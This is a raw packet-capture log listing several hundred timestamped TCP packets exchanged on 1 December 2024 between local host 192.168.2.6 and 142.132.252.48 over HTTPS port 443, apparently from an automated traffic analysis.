                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.948134899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.948152065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.949125051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.949152946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.949198961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.949240923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.949245930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.949280024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.966742992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.987922907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.987945080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.988053083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.988082886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.988147974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.992886066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.992908001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.992980957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.992990017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:17.993036985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.002533913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.002572060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.002677917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.002715111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.002759933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.007983923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.008007050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.008091927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.008120060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.008169889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.030595064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.030641079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.030729055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.030740023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.030782938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.036323071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.036355972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.036444902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.036453009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.036504984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.041774035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.041805983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.041846037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.041853905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.041891098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.041903973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.047605991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.047658920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.047760010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.047770023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.047822952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.188870907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.188899040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.188950062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.188963890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.189002991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.189532995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.194485903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.194539070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.194586992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.194596052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.194643021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.194690943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.204793930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.204823971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.204902887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.204912901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.204958916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.209574938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.209602118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.209692955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.209706068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.209744930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.231739998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.231777906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.231878042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.231888056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.231934071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.237462044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.237490892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.237571001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.237580061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.237632036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.243122101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.243149996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.243230104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.243238926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.243288994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.248838902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.248866081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.248963118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.248992920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.249053955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.390134096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.390186071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.390201092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.390219927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.390258074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.395687103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.395709038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.395752907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.395761967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.395802021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.395812988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.405595064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.405627012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.405663967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.405688047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.405706882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.405735970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.411169052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.411190033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.411230087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.411242008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.411289930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.414326906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.434159040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.434196949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.434232950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.434242010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.434293985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.438980103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.438998938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.439034939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.439043045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.439073086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.439088106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.444541931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.444564104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.444595098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.444603920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.444634914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.444686890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.450325966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.450352907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.450402975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.450417042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.450463057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.591597080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.591629028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.591727972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.591746092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.591792107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.597060919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.597090006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.597137928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.597148895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.597174883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.597189903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.610431910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.610466003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.610531092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.610553980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.610565901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.610594988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.614939928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.614983082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.615015030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.615030050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.615065098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.615109921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.635082006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.635107994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.635220051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.635237932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.635282993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.640069008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.640094042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.640141010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.640151978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.640162945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.640192032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.645840883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.645936966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.645976067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.646047115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.651613951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.651637077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.651702881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.651702881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.651715040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.651777029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.701467991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.793188095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.793226004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.793358088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.793366909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.793457985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.799215078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.799242973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.799303055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.799309969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.799331903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.799359083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.810967922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.810997963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.811131954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.811140060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.811184883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.816438913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.816466093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.816591978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.816601992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.816639900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.836503983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.836539030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.836680889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.836688042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.836699009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.836736917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.841514111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.841542006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.841633081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.841639996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.841684103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.847673893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.847692013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.847742081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.847750902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.847781897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.847800970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.852879047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.852901936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.852967978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.852976084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.853023052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.955254078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.994744062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.994771004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.994925976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.994935036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.994982958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.999486923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.999505997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.999568939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.999577999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.999588013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:18.999619007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.012701988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.012721062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.012814999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.012824059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.012871981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.017788887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.017812967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.017882109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.017916918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.017932892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.017962933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.037847996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.037869930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.037945032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.037962914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.038012981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.042824984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.042841911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.042896986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.042913914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.042963982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.048572063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.048588991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.048640013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.048650026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.048701048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.054128885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.054147005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.054217100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.054225922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.054266930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.134350061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.198386908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.198421001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.198540926 CET49721443192.168.2.6142.132.252.48
